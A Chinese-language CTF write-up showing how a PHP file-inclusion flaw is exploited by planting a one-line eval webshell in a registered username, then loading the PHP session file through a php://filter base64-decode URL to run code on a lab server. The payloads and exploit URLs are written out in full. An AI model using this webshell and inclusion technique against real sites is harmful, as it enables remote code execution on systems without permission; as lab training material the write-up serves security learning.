文件包含漏洞之包含SESSION(CTF题目)

这次使用的环境是ubuntu+nginx+php+mysql

首先四个文件源码在以下链接中:

一道CTF题:PHP文件包含 | Chybeta

我们注册一个用户名111密码111,然后登录查看cookie和linux的session,因为我们的de服务器

是手动搭建的,所以容易知道session的位置。

我们查看这个session:

复制代码
cd /var/lib/php/sessions

发现我们的用户名以base64编码的格式放在了session中,因此我们只要把含有木马的用户名注册了,这个木马就会以base64编码的格式放在session中,并且路径我们也是知道的。

我们把一句话木马注册,可以看到木马已经被放进数据库里面了,session中也存在

15

复制代码
192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_hej7e9k4vjusbpumknkvsks5f1

但是上面的payload不能执行,因为session中还包含着15位的前缀,需要让其乱码

需要重新注册一个base64编码后的名字长度大于100的

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>

重复上述步骤

注册这个用户名:

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>
复制代码
http://192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_bhbl2nhonauub8vko76g2ublkt&atebyhc=phpinfo();

成功!

相关推荐
安卓开发者4 小时前
鸿蒙NEXT的Web组件网络安全与隐私保护实践
前端·web安全·harmonyos
KKKlucifer5 小时前
国家网络安全通报中心:重点防范境外恶意网址和恶意 IP
tcp/ip·安全·web安全
wanhengidc5 小时前
手机云服务是什么意思?
运维·网络·安全·游戏·智能手机
德迅云安全-小潘5 小时前
网页防篡改技术:原理、应用与安全保障
web安全
TG_yilongcloud6 小时前
阿里云国际代理:怎么保障数据库在凭据变更过程中的安全与稳定?
数据库·安全·阿里云·云计算
JialBro6 小时前
S7-200 SMART PLC 安全全指南:配置、漏洞解析与复现防护
安全·plc·工控安全·西门子
ZeroNews内网穿透7 小时前
企业远程访问方案选择:何时选内网穿透,何时需要反向代理?
运维·服务器·网络·python·安全
lingggggaaaa8 小时前
小迪安全v2023学习笔记(八十二讲)—— Java组件安全&Solr&Shiro&Log4j&CVE复现
笔记·学习·安全
NiKo_W9 小时前
Git 版本回退与撤销修改
开发语言·git·安全
小白电脑技术14 小时前
怕数据传输不安全?公网DDNS vs 虚拟局域网,哪种更安全?小白用户怎么选?
安全